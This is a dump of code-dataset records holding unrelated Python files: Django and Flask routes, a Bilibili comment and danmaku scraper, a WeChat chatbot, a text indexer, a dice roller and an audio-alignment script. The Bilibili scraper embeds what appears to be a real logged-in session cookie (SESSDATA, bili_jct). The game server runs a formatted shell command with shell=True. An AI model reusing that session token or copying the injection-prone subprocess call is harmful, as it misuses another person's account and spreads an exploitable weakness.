'/usr/local/etc/squid.conf'\nSQUID_TEMPLATE_PATH = '/etc/squid/squid.conf.backup' # mac os /usr/local/etc/squid.conf.backup\n\n# client settings\n# client picks proxies which's response time is between 0 and 5 seconds\nLONGEST_RESPONSE_TIME = 10\n# client picks proxies which's score is not less than 7\nLOWEST_SCORE = 7\n","sub_path":"haipproxy/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650770903","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.TocataAbiertaListView.as_view(), name='tocatasabiertas'),\n path('/', views.TocataAbiertaDetailView.as_view(), name='tocataabierta'),\n path('artista/mistocatasabiertas', views.TocatasAbiertasArtistaListView.as_view(), name='mistocatasabiertas'),\n path('artista/creartocataabierta', views.TocataAbiertaCreateView.as_view(), name='creartocataabierta'),\n path('artista/borrartocataabierta', views.BorrarTocataAbiertaView.as_view(), name='borrartocataabierta'),\n path('artista/suspendertocataabierta', views.SuspenderTocataAbiertaView.as_view(), name='suspendertocataabierta'),\n path('ajax/load-comunas_tocata/', views.carga_comunas_tocata, name='ajax_load_comunas_tocata'),\n]\n","sub_path":"tocataabierta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"57390836","text":"import os\nimport numpy as np\nimport subprocess\nfrom multiprocessing.pool import ThreadPool as Pool\n\n\nclass GoldenNumberServer(object):\n def __init__(self, players_bot_list):\n self.players_bot_list = players_bot_list\n self.scores = np.zeros(len(players_bot_list))\n self.history_str_head = '0\\t{}\\n'.format(1 + 2*len(players_bot_list))\n self.history_str_body = ''\n self.pool = Pool(processes=16)\n\n def run(self):\n # get all numbers from players\n numbers = np.reshape(np.array(self.pool.map(self._get_number, self.players_bot_list)), -1)\n\n golden_number = np.mean(numbers) * 0.618\n self._update_history_str(golden_number, numbers)\n errors = np.abs(golden_number - numbers)\n min_error = np.min(errors)\n max_error = np.max(errors)\n win_flags = (errors[0::2] == min_error) + (errors[1::2] == min_error)\n lose_flags = (errors[0::2] == max_error) + (errors[1::2] == max_error)\n self.scores[win_flags] += len(self.players_bot_list)\n self.scores[lose_flags] -= 2\n rank = np.argsort(-self.scores)\n\n return float(golden_number), numbers, win_flags, lose_flags, rank\n\n def _get_number(self, bot):\n std_in = self.history_str_head + self.history_str_body\n cur_path = os.path.abspath(os.path.dirname(__file__))\n cache_path = os.path.join(cur_path, 'cache.txt')\n with open(cache_path, 'w') as f:\n f.write(std_in)\n bot_out = subprocess.check_output('python {} < {}'.format(bot, cache_path),shell=True)\n bot_out = bot_out[:-1]\n bot_out = bot_out.decode()\n bot_out_number = np.array(bot_out.split('\\t')).astype(float)\n return bot_out_number\n\n def _update_history_str(self, golden_number, numbers):\n row_str, col_str = self.history_str_head.split('\\t')\n row_str = str(int(row_str) + 1)\n self.history_str_head = row_str + '\\t' + col_str\n self.history_str_body += '\\t'.join(np.concatenate(([golden_number], numbers)).astype(np.str)) + '\\n'\n\n def reset(self):\n self.scores = np.zeros(len(self.players_bot_list))\n self.history_str_head = '0\\t{}\\n'.format(1 + 2*len(self.players_bot_list))\n self.history_str_body = ''","sub_path":"env/golden_number_server.py","file_name":"golden_number_server.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"114320978","text":"import requests\nimport json\nimport re\nimport datetime\nimport bs4\nfrom tqdm import tqdm\nfrom avtobv import AvBv\nimport time\nimport pandas as pd\nimport os\nimport numpy as np\ncookies={}\nremove_chars = '[·’!\"\\#$%&\\'()#!()*+,-./:;<=>?\\@,:?¥★、….>【】[]《》?“”‘’\\[\\\\]^_`{|}~—◢—]+'\ndef 
format_cookie(cookie_str):\n cookies={}\n for line in cookie_str.split(';'):\n key,value=line.split('=')\n cookies[key]=value\n return cookies\ndef get_cid(bv):\n cid_url = f'https://api.bilibili.com/x/player/pagelist?bvid={bv}&jsonp=jsonp'\n res = requests.get(cid_url)\n res_text=res.text\n res_dict=json.loads(res_text)\n\n part_list = res_dict['data']\n new_part_list=[]\n for part in part_list:\n new_part={'cid':part.get('cid'),'part_name':part.get('part')}\n new_part_list.append(new_part)\n return new_part_list\ndef get_startday(bv):\n cid_url = f'https://www.bilibili.com/video/{bv}'\n res = requests.get(cid_url)\n res_html=res.text\n print(cid_url)\n #print(res.text)\n soup=bs4.BeautifulSoup(res_html,'lxml')\n mounth=soup.find('div',class_='video-data').find_all('span')[1].text.split(' ')[0]#.stripped_strings()\n\n aid=soup.find('meta',property='og:url')['content'].split('/')[-2].split('av')[-1]\n\n return aid,mounth\ndef get_aid(cid):\n aid_url=f'http://interface.bilibili.com/player?id=cid:{cid}'\n aid=requests.get(aid_url,cookies=cookies)\n print(aid_url)\n print(aid.text)\n return\ndef _get__one_month_data_list(cid,month):\n #https: // api.bilibili.com / x / v2 / dm / history / index?type = 1 & oid = 182435882 & month = 2020 - 04\n\n data_list_url = f'https://api.bilibili.com/x/v2/dm/history/index?type=1&oid={cid}&month={month}'\n res = requests.get(data_list_url,cookies=cookies)\n res_dict=json.loads(res.text)\n data_list=res_dict.get('data')\n return data_list\ndef _get_dan_mu_xml(cid,date):\n dan_mu_url = f'https://api.bilibili.com/x/v2/dm/history?type=1&oid={cid}&date={date}'\n res=requests.get(dan_mu_url,cookies=cookies)\n da_mu_xml=res.content.decode('utf8')\n #print(dan_mu_url)\n return da_mu_xml\ndef _parse_dan_mu(_get_dan_mu_xml):\n #print(_get_dan_mu_xml)\n reg=re.compile('([\\s\\S]+?)')\n\n find_result=reg.findall(_get_dan_mu_xml)\n\n dan_mu_list=[]\n for line in find_result:\n p,dan_mu=line\n dm_time=float(p.split(',')[0])\n\n time_stamp = int(p.split(',')[4])\n dm_type = int(p.split(',')[5])\n dm_id=p.split(',')[6]\n date_array=datetime.datetime.fromtimestamp(time_stamp)\n send_time=date_array.strftime('%Y-%m-%d %H:%M:%S')\n dan_mu_list.append([dm_time,send_time,dm_type,dm_id,dan_mu])\n return dan_mu_list\ndef get_status(bv):\n transorform=AvBv()\n aid=transorform.dec(bv)\n headers = {\n 'Host': 'api.bilibili.com',\n 'Referer': 'https://www.bilibili.com/video/av77413543',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'\n }\n info = f'https://api.bilibili.com/x/web-interface/archive/stat?aid={aid}'\n info_rsp = requests.get(url=info, headers=headers)\n info_json = info_rsp.json()\n info_data=info_json['data']\n return info_data\n\ndef get_view(bvid):\n headers = {\n 'Host': 'api.bilibili.com',\n 'Referer': 'https://www.bilibili.com/video/av77413543',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'\n }\n info =' https://api.bilibili.com/x/web-interface/view?bvid='+ bvid\n info_rsp = requests.get(url=info, headers=headers)\n info_json = info_rsp.json()\n info_data=info_json['data']\n return info_data\n\n\n\nclass language:\n def __init__(self):\n str=''\n with open('Enlist.txt',encoding='UTF8') as f :\n str=f.read()\n self.Endict=json.loads(str)\n #self.status_En=Endict['status']\n #print(self.status_En)\n def status_ENtoCn(self,str):\n status_En = self.Endict['status']\n En=str\n\n CN=status_En[En]\n 
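# plain dict indexing, so an unknown status string raises KeyError\n        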
return CN\n\n\ndef getAllCommentList(bv):\n transorform=AvBv()\n av=transorform.dec(bv)\n url = \"http://api.bilibili.com/x/reply?type=1&oid=\" + str(av) + \"&pn=1&nohot=1&sort=0\"\n info_list=[]\n filename=f'{bv}/{bv}_comment.csv'\n r = requests.get(url)\n numtext = r.text\n json_text = json.loads(numtext)\n commentsNum = json_text[\"data\"][\"page\"][\"count\"]\n page = commentsNum // 20 + 1\n #page=2\n for n in tqdm(range(1, page)):\n url = \"https://api.bilibili.com/x/v2/reply?jsonp=jsonp&pn=\" + str(n) + \"&type=1&oid=\" + str(av) + \"&sort=1&nohot=1\"\n req = requests.get(url)\n text = req.text\n json_text_list = json.loads(text)\n # for i in json_text_list[\"data\"][\"replies\"]:\n # #print([i[\"member\"][\"uname\"], i[\"content\"][\"message\"]])\n # info_list.append([i[\"member\"][\"uname\"], i[\"content\"][\"message\"],i['like']])\n get_replies(json_text_list[\"data\"],info_list,n)\n #info_list.append(json_text_list)\n tmp_df=pd.DataFrame(info_list,columns=['uname','sex','message','like','rpid','root','ctime','page'])\n tmp_df.to_csv(filename,index=False)\n return info_list\n\n\ndef get_replies(data,info_list,page):\n n=page\n if data['replies']==None:\n return\n else:\n for replies in data['replies']:\n info_list.append([replies[\"member\"][\"uname\"],replies[\"member\"][\"sex\"], replies[\"content\"][\"message\"], replies['like'],replies['rpid'],replies['root'],replies['ctime'],n])\n get_replies(replies, info_list,n)\n\n# def get_replies(data,info_list):\n# for replies in data['replies']:\n# info_list.append([replies[\"member\"][\"uname\"], replies[\"content\"][\"message\"], replies['like'],replies['rpid'],replies['root'],replies['ctime']])\n# get_replies(replies, info_list)\n\n\ndef get_data_history(cid_data_list,pubdate,nowdate):\n date_history_list=[]\n\n for cid_item in cid_data_list:\n # print(time.strftime(\"%Y--%m--%d %H:%M:%S\", pudtime))\n # print(time.strftime(\"%Y--%m--%d %H:%M:%S\", now))\n #now = datetime.date.today()\n now= datetime.datetime.now()\n #nowdate=time.time()\n #now=time.localtime(nowdate)\n pudtime =datetime.datetime.fromtimestamp(pubdate)\n year = now.year\n month = now.month\n #print(now)\n start_year = pudtime.year\n start_mounth = pudtime.month\n #pre_month_last_day = now.date()\n pre_month_last_day = now.date()\n while pre_month_last_day>pudtime.date():\n one_month_date_list = _get__one_month_data_list(cid_item['cid'],f'{year}-{month:>02}')\n print(one_month_date_list)\n if one_month_date_list:\n cid_item['date_list']=cid_item.get('date_list',[])\n cid_item['date_list'].extend(one_month_date_list)\n this_month_first_day=datetime.date(year,month,1)\n #print(this_month_first_day)\n pre_month_last_day=this_month_first_day-datetime.timedelta(days=1)\n year=pre_month_last_day.year\n month=pre_month_last_day.month\n date_history_list.append(cid_item)\n return date_history_list\n\n\ndef get_all_dan_mu(data_historry_list,bv):\n for item in data_historry_list:\n part_name = item.get('part_name')\n filename = bv\n if part_name:\n filename=f'{bv}_{part_name}'\n with open(f'{filename}.txt','w',encoding='utf8') as f:\n for date in tqdm(item['date_list']):\n dan_mu_xml=_get_dan_mu_xml(item['cid'],date)\n dan_mu_list=_parse_dan_mu(dan_mu_xml)\n #print(dan_mu_list[0])\n for dan_mu_item in dan_mu_list:\n line = '<;>'.join(dan_mu_item)\n f.writelines(line)\n f.write('\\n')\n\ndef get_all_dan_mu_new(data_historry_list,bv):\n for item in data_historry_list:\n #print(item)\n part_name = item.get('part_name')\n part_name=part_name.replace('.','_')\n filename = bv\n 
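# gather every archived day's danmaku for this part before writing a single CSV\n        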
all_dm_list=[]\n if part_name:\n filename=f'{bv}_{part_name}.csv'\n #with open(f'{filename}.txt','w',encoding='utf8') as f:\n for date in tqdm(item['date_list']):\n dan_mu_xml=_get_dan_mu_xml(item['cid'],date)\n dan_mu_list=_parse_dan_mu(dan_mu_xml)\n all_dm_list.extend(dan_mu_list)\n #print(dan_mu_list[0])\n # for dan_mu_item in dan_mu_list:\n # line = '<;>'.join(dan_mu_item)\n # f.writelines(line)\n # f.write('\\n')\n df=pd.DataFrame(all_dm_list,columns=['time','sendtime','dmtype','id','content'])\n df.to_csv(f'{bv}/{filename}', index=False)\n\nif __name__ == '__main__':\n a=language()\n\n bv=\"BV1VD4y1D788\"\n #bv='BV1w64y1c7Gb'\n dirs=f'{bv}'\n if not os.path.exists(dirs):\n os.makedirs(f'{dirs}')\n\n cookie_str=\"\"\"CURRENT_FNVAL=16; _uuid=38285B20-6C3C-34A8-744A-B823DDF01C2C48839infoc; buvid3=2978B47B-C905-47F9-8D8A-4AC344F02378155816infoc; DedeUserID=4348911; DedeUserID__ckMd5=6ace9c7a6f620f59; SESSDATA=9b4d7c1a%2C1607260982%2C844d4*61; bili_jct=a6fbb288df0ecb23bb10c8d57664e0e5; LIVE_BUVID=AUTO5815917089829153; rpdid=|(k)~u~)lmmY0J'ulmkm|JJ)Y; PVID=4; sid=5suetco3\"\"\"\n cookies = format_cookie(cookie_str)\n cid_data_list=get_cid(bv)\n view=get_view(bv)\n print(view)\n aid=view['stat']['aid']\n pubdate=view['pubdate']\n now_date=view['ctime']\n name=view['title']\n #get_aid(cid_data_list[0]['cid'])\n #aid,start_day=get_startday(bv)\n data_historry_list=get_data_history(cid_data_list,pubdate,now_date)\n print(data_historry_list)\n # view=getAllCommentList(bv)\n # print(view)\n #print(data_historry_list)\n getAllCommentList(bv)\n get_all_dan_mu_new(data_historry_list,bv)","sub_path":"app/dmscripy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"16162961","text":"# https://www.reddit.com/r/dailyprogrammer/comments/8s0cy1/\nimport random\n\n\ndef main():\n # IDK why I did this.\n def num_as_word(num):\n num_words = [\"zero\", \"one\", \"two\", \"three\", \"four\", \"five\",\n \"six\", \"seven\", \"eight\", \"nine\", \"ten\"]\n return num if num > 10 else num_words[num]\n separator = 'd'\n help_str = f\"Dice Roller!\\nInput format like '2{separator}6'\"\n help_str2 = \"Cannot roll less than 1 die, cannot roll less than a d2.\"\n\n # Start program\n print(help_str)\n while True:\n input_str = input(\"> \")\n split_input = input_str.partition(separator)\n\n # First check that it found the separator and the other characters are numbers\n if split_input[1] is separator and (split_input[0].isnumeric() and split_input[2].isnumeric()):\n count, _, die = split_input\n count = int(count)\n die = int(die)\n # print error for invalid rolls\n if count < 1 or die < 2:\n print(help_str2)\n continue\n print(f\"Rolling {num_as_word(count)} {num_as_word(die)}-sided {'die' if count == 1 else 'dice'}: \")\n result = 0\n rolls_list = []\n for _ in range(count):\n roll = random.randint(1, die)\n result += roll\n rolls_list.append(roll)\n print(f\"{rolls_list} = {result}\")\n else:\n print(help_str)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dailyprogrammer/diceroller.py","file_name":"diceroller.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"143930633","text":"\n\n#calss header\nclass _REIN():\n\tdef __init__(self,): \n\t\tself.name = \"REIN\"\n\t\tself.definitions = [u'a long, thin piece of material, especially leather, that helps you to control and direct a horse: 
', u\"a strap that is put around a small child's body or wrist and held at the other end by an adult so that the adult can stop the child running away: \"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_rein.py","file_name":"_rein.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272008802","text":"\ncontent_dict = {}\n\n\nfile = open('../given_resources/cacm_stem.txt','rU') \nfor line in file:\n if line[0] == '#':\n i = line.split()[1]\n content_dict['CACM-'+str(i).zfill(4)] = ''\n \n else:\n content_dict['CACM-'+str(i).zfill(4)] += line+' '\n \n\n\n# given a integer n\n# returns index of word n gram\ndef make_index_n():\n index = {}\n doc_length_dict = {}\n for file_name in content_dict:\n doc_length_dict[file_name] = len(content_dict[file_name].split())\n print(\"Processing : \"+file_name)\n term_freq_in_doc = {}\n \n word_list = content_dict[file_name].split()\n word_list = filter_ascii(word_list)\n\n for word in word_list:\n if word in term_freq_in_doc.keys():\n term_freq_in_doc[word] += 1\n else:\n term_freq_in_doc[word] = 1\n \n for key in term_freq_in_doc.keys():\n did_freq = [file_name, term_freq_in_doc[key]]\n if key in index.keys():\n index[key].append(did_freq)\n else:\n index[key] = [did_freq]\n save_index(index, doc_length_dict)\n print('Index Created')\n\n\n# given index and integer n\n# saves the index\ndef save_index(i,j):\n fw = open('../index_stemmed' + '.txt', 'w', encoding='utf-8')\n fw.write(str(i))\n fw.close()\n\n file = open('../docs_length_stemmed.txt','w')\n file.write(str(j))\n file.close()\n\n# given a string s\n# return true if string contains ascii characters\ndef is_english(s):\n try:\n s.encode(encoding='utf-8').decode('ascii')\n except UnicodeDecodeError:\n return False\n else:\n return True\n\n\n# given list of strings\n# return all string that can be encoded through ascii\ndef filter_ascii(words):\n word_list = []\n for word in words:\n if is_english(word):\n word_list.append(word)\n\n return word_list\n\n\nmake_index_n()","sub_path":"resources/source_code/indexer_stemmed.py","file_name":"indexer_stemmed.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"454635816","text":"# coding: utf-8\n\n\"\"\"\n\n ~~~~~~~~~~\n\n :author Skyduy \n\n\"\"\"\nfrom __future__ import unicode_literals\n\nimport random\nfrom random import randint\nfrom WeChat.config import filter_path\nfrom text_filter import DFAFilter\nfrom utils import HandlerRedisDB0, HandlerRedisDB1, HandlerMySQL\n\n\ndef get_text_reply(message):\n \"\"\"\n :param message: 文本消息对象,有以下属性\n id: 消息ID\n target: 消息目的者, 即本服务器\n source: 消息源, 即发送者\n time: 消息发送时间\n content: 消息文本内容\n :return: 文本消息\n \"\"\"\n source = message.source\n handler_redis0 = HandlerRedisDB0(source)\n handler_redis1 = HandlerRedisDB1()\n handler_sql = HandlerMySQL(source)\n text_filter = DFAFilter(filter_path)\n content = message.content.strip()\n handler_redis0.active_daily()\n if content == '':\n return '?'*randint(1, 5)\n state = handler_redis0.get_state()\n instruction = ['学习', '帮助', '段子', '我的豆子', '你是谁']\n if state == '0':\n if content in instruction:\n if content == '学习':\n handler_redis0.chg_state()\n return '输入问题:'\n elif content == '帮助':\n content 
= '小D有如下指令:\\n1、学习\\n2、段子\\n3、我的豆子\\n4、帮助\\n向小D发送即可执行'\n return content\n elif content == '你是谁':\n content = '这是一个开源的并没有什么技术含量的聊天机器人\\n' \\\n '你可以在这里找到源代码: https://github.com/skyduy/wechat\\n' \\\n '如果你在搭建或继续开发的过程中遇到什么问题,可以直接发邮件到 cuteuy@gmail.com'\n return content\n elif content == '我的豆子':\n balance = handler_redis0.get_money()\n return '你还剩%s颗豆子~\\n·教小D知识+10豆\\n·和小D聊天+1豆' % balance\n elif content == '段子':\n joke, rank = handler_redis0.get_joke_rank()\n if joke == '':\n return '库存没有段子了!管理员正在运货!'\n rank = int(rank)\n if not handler_redis0.has_read():\n reductions = 1 if 31 <= rank <= 40 else 2 if 26 <= rank <= 30 else \\\n 4 if 23 <= rank <= 25 else 8 if 21 <= rank <= 22 else 0\n enough, balance = handler_redis0.reduce_money(reductions)\n if not enough:\n return '你仅剩颗%s个豆子,不能购买价值%s的段子了, 回复\"学习\"教我知识吧,能赚豆子哦!' \\\n % (balance, reductions)\n elif rank > 21:\n fee = '付费'\n num = rank - 20\n tip = '[你购买了价值%s豆的段子,还剩下%s颗豆子]' % (reductions, balance)\n elif rank == 21:\n fee = '付费'\n num = rank - 20\n tip = '[你购买了价值%s豆的最后一餐付费段子,还剩下%s颗豆子,接下来的20个段子免费哦]' % \\\n (reductions, balance)\n elif rank > 1:\n fee = '免费'\n num = rank\n tip = '[本条为免费段子~]'\n else:\n fee = '免费'\n num = rank\n tip = '[今天的段子讲完啦~不过可以重温讲给女票!(重温免费)]'\n handler_redis0.read_over()\n content = '今日%s段子[%s]:\\n%s\\n\\n%s' % (fee, str(num), joke, tip)\n else:\n tip = '\\n[此条为免费重温段子,每日更新]'\n content = '今日段子[%s]:\\n%s\\n\\n%s' % (str(rank), joke, tip)\n handler_redis0.chg_joke_rank()\n return content\n else:\n handler_sql.add_chat_record(content)\n handler_redis0.add_money()\n ids = handler_redis1.id_from_redis(content)\n if not ids:\n return '该问题还没人教呢!回复“学习”教教小D吧!'\n qa_id = random.choice(ids)\n answer = handler_sql.get_answer_by_id(qa_id)\n if answer is None:\n return '该问题还没人教呢!回复“学习”教教小D吧!'\n return answer\n\n if state == '1':\n if content in instruction:\n return '指令无法作为问题,请重新输入其他问题。'\n else:\n handler_redis0.add_question(content)\n handler_redis0.chg_state()\n return '对于问题:%s\\n输入其答案:' % content\n\n if state == '2':\n handler_redis0.chg_state()\n question = handler_redis0.get_question()\n if not question:\n return '呜...小D只知道你在一小时或者更久之前问过问题,但是忘记问题是什么了...'\n\n if text_filter.included_in(content):\n handler_sql.add_sensitive_qa(question, content)\n return '(#゚Д゚)!小D检测到您的回答中有敏感词汇,学习失败。'\n else:\n qa_id = handler_sql.add_valid_qa(question, content)\n handler_redis0.add_money(10)\n handler_redis1.content_to_redis(question, qa_id)\n return '问题:%s\\n答案:%s\\n学习成功:)' % (unicode(question, 'utf-8'), content)\n","sub_path":"WeChat/handlers/wechat_reply.py","file_name":"wechat_reply.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519033402","text":"from __future__ import print_function, division\nimport os\nimport pandas as pd\nimport time\nimport sox\n\n# \n# \n# Zero-pads and trims all audio files to match the versions used in SALAMI.\n# \n# \n\nmatchlist_csv_filename = os.getcwd() + \"/salami_youtube_pairings.csv\"\ndownloaded_audio_folder = os.getcwd() + \"/downloaded_audio\"\ntransformed_audio_folder = os.getcwd() + \"/transformed_audio\"\n\n# Specify location of downloaded audio\n\ndownloaded_audio_folder = os.getcwd() + \"/downloaded_audio\"\nif not os.path.exists(downloaded_audio_folder):\n\tos.makedirs(downloaded_audio_folder)\n\nif not os.path.exists(transformed_audio_folder):\n\tos.makedirs(transformed_audio_folder)\n\ndef reshape_audio(salami_id, match_data):\n\trow = {colname: match_data[colname][match_data.salami_id==salami_id].values[0] 
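# one scalar per column for this salami_id\n\t\t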
for colname in match_data.columns}\n\tinput_filename = downloaded_audio_folder + \"/\" + str(row[\"youtube_id\"]) + \".mp3\"\n\toutput_filename = transformed_audio_folder + \"/\" + str(row[\"salami_id\"]) + \".mp3\"\n\tstart_time_in_yt = row[\"onset_in_youtube\"] - row[\"onset_in_salami\"]\n\t# = - row[\"time_offset\"]\n\tend_time_in_yt = start_time_in_yt + row[\"salami_length\"]\n\ttfm = sox.Transformer()\n\tif end_time_in_yt > row[\"youtube_length\"]:\n\t\ttfm.pad(end_duration=end_time_in_yt - row[\"youtube_length\"])\n\tif start_time_in_yt < 0:\n\t\ttfm.pad(start_duration=-start_time_in_yt)\n\t\tstart_time_in_yt = 0\n\t# Select portion of youtube file to match salami\n\ttfm.trim(start_time_in_yt, start_time_in_yt+row[\"salami_length\"])\n\ttfm.build(input_filename, output_filename)\n\nif __name__ == \"__main__\":\n\tmatch_data = pd.read_csv(matchlist_csv_filename, header=0)\n\tmatch_data = match_data.fillna(\"\")\n\tfor ind in match_data.index:\n\t\ttry:\n\t\t\treshape_audio(match_data.salami_id[ind], match_data)\n\t\t\ttime.sleep(2)\n\t\texcept (KeyboardInterrupt):\n\t\t\traise\n\t\texcept:\n\t\t\tprint(\"Error while attempting to process row {0}: {1} (salami_id {2}).\".format(ind,match_data.youtube_id[ind],match_data.salami_id[ind]))\n","sub_path":"align_audio.py","file_name":"align_audio.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"260018174","text":"import PySimpleGUI as sg\nfrom .view import View\n\n\nclass ViewCadastroCurso(View):\n\n def __init__(self):\n pass\n\n def rodar(self, window, erro):\n if erro:\n window.Element(\"invalid_field\").Update(\n f\"Campo inválido: {erro}\", visible=True)\n while True:\n event, values = window.read()\n if event == \"Enviar\":\n window.Element(\"invalid_field\").Update(visible=False)\n\n return self.voltar(result=values)\n if event == \"Voltar\" or event == sg.WIN_CLOSED:\n return self.voltar(view=window)\n\n def comecar(self, erro=None, **kwargs):\n layout = [\n [sg.Text(\"Cadastro de Curso\")],\n [sg.Text(\"\", size=(50, 2), key=\"invalid_field\", visible=False)],\n [sg.Text(\"Nome do Curso\", size=(20, 1)),\n sg.Input(key=\"nome_curso\", default_text=kwargs.setdefault(\"nome_curso\"))],\n [sg.Text(\"Link do Curso\", size=(20, 1)),\n sg.Input(key=\"link_curso\", default_text=kwargs.setdefault(\"link_curso\"))],\n [sg.Text(\"Preço do Curso\", size=(20, 1)),\n sg.Input(key=\"preco_curso\", default_text=kwargs.setdefault(\"preco_curso\"))],\n [sg.Submit(\"Enviar\")],\n [sg.Button(\"Voltar\")]\n ]\n window = sg.Window(\"Cadastro de Curso\", layout=layout,\n element_justification='c').Finalize()\n result = self.rodar(window, erro)\n window.close()\n return result\n","sub_path":"view/viewCadastroCurso.py","file_name":"viewCadastroCurso.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"34510798","text":"from flask import render_template, redirect, url_for, abort, request\nfrom ..models import User, Pitch, Comments, PitchCategory, Votes\nfrom flask_login import login_required, current_user \nfrom .forms import PitchForm, CommentForm, UpdateProfile, CategoryForm\nfrom .. import db, photos\nfrom . 
import main\n\n\n@main.route ('/')\ndef index():\n \"\"\"\n Function that returns index page and data\n \"\"\"\n category = PitchCategory.get_categories()\n return render_template('index.html', categories = category)\n\n@main.route('/category/new-pitch/', methods= ['GET', 'POST'])\n@login_required\ndef new_pitch(id):\n \"\"\"\n Function to fetch data \n \"\"\"\n form = PitchForm()\n category = PitchCategory.query.filter_by(id=id).first()\n\n if category is None:\n abort(404)\n \n if form.validate_on_submit():\n pitch = form.pitch.data\n new_pitch = Pitch(pitch = pitch, category_id = category.id, user_id= current_user.id)\n new_pitch.save_pitch()\n \n\n return redirect(url_for('.category', id= category.id))\n \n return render_template('new_pitch.html', pitch_form = form, category = category) \n\n@main.route ('/categories/')\n@login_required\ndef category(id):\n category = PitchCategory.query.get(id)\n if category is None:\n abort (404)\n \n pitches = Pitch.get_pitches(id)\n \n return render_template ('category.html', pitches = pitches, category= category)\n\n\n@main.route('/add/category', methods = ['GET', 'POST'])\n@login_required\ndef new_category():\n form = CategoryForm()\n \n if form.validate_on_submit():\n name = form.name.data\n new_category = PitchCategory(name=name)\n new_category.save_category()\n \n db.session.add(new_category)\n db.session.commit()\n return redirect(url_for('.index'))\n title = 'New Category' \n return render_template('post_comment.html', comment_form = form, title = title) \n\n@main.route('/view/', methods = ['GET', 'POST'])\n@login_required\ndef view_pitch(id):\n \"\"\"\n Function that returns a single pitch with comments\n \"\"\"\n print(id)\n pitches = Pitch.query.get(id)\n if pitches is None:\n abort(404)\n \n comment = Comments.get_comments(id)\n title = 'View Pitch'\n return render_template('view.html', pitches= pitches, comment = comment, category_= id, title= title)\n\n@main.route('/write_comment/', methods=['GET', 'POST'])\n@login_required\ndef post_comment(id):\n \"\"\"\n Fuction to add comments\n \"\"\"\n form = CommentForm()\n title = \"Add a comment\"\n pitches = Pitch.query.filter_by(id=id).first()\n\n if form.validate_on_submit():\n comment = form.comment.data\n new_comment = Comments(comment=comment, user_id=current_user.id, pitches_id=pitches.id)\n new_comment.save_comment()\n return redirect(url_for('.view_pitch', id=pitches.id))\n\n return render_template('post_comment.html', comment_form=form, title=title)\n\n@main.route('/user/')\n@login_required\ndef profile(uname):\n user = User.query.filter_by (username = uname).first()\n \n if user is None:\n abort(404)\n \n return render_template('profile/profile.html', user = user)\n\n@main.route('/user//update', methods = ['GET', 'POST'])\n@login_required\ndef update_profile(uname):\n user = User.query.filter_by (username = uname).first()\n if user is None:\n abort(404)\n \n form = UpdateProfile()\n if form.validate_on_submit():\n user.bio = form.bio.data\n db.session.add(user)\n db.session.commit()\n \n return redirect(url_for('.profile', uname = user.user))\n return render_template('profile/update.html', form = form)\n\n@main.route('/user//update/pic',methods= ['POST'])\n@login_required\ndef update_pic(uname):\n user = User.query.filter_by(username = uname).first()\n if 'photo' in request.files:\n filename = photos.save(request.files['photo'])\n path = f'photos/{filename}'\n user.profile_pic_path = path\n db.session.add(user)\n db.session.commit()\n return 
redirect(url_for('main.profile',uname=uname))\n\n# voting\n@main.route('/pitch/upvote/')\n@login_required\ndef upvote(id):\n    '''\n    View function that adds one to the vote_number column in the votes table\n    '''\n    pitch_id = Pitch.query.filter_by(id=id).first()\n\n    if pitch_id is None:\n        abort(404)\n\n    new_vote = Votes(vote=int(1), user_id=current_user.id, pitches_id=pitch_id.id)\n    new_vote.save_vote()\n    return redirect(url_for('.view_pitch', id=id))\n\n\n\n@main.route('/pitch/downvote/')\n@login_required\ndef downvote(id):\n    pitch_id = Pitch.query.filter_by(id=id).first()\n\n    new_vote = Votes(vote=int(2), user_id=current_user.id, pitches_id=pitch_id.id)\n    new_vote.save_vote()\n    return redirect(url_for('.view_pitch', id=id))\n\n@main.route('/pitch/downvote/')\n@login_required\ndef vote_count(id):\n\n    votes = Votes.query.filter_by(user_id=current_user.id).all()\n\n    total_votes = len(votes)\n\n    return total_votes\n\n@main.route('/like//')\n@login_required\ndef like_action(comment_id, action):\n    comment = Comments.query.filter_by(id=comment_id).first_or_404()\n    if action == 'vote':\n        current_user.vote_comment(comment)\n        db.session.commit()\n    if action == 'downvote':\n        current_user.unlike_comment(comment)\n        db.session.commit()\n    return redirect(request.referrer) \n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 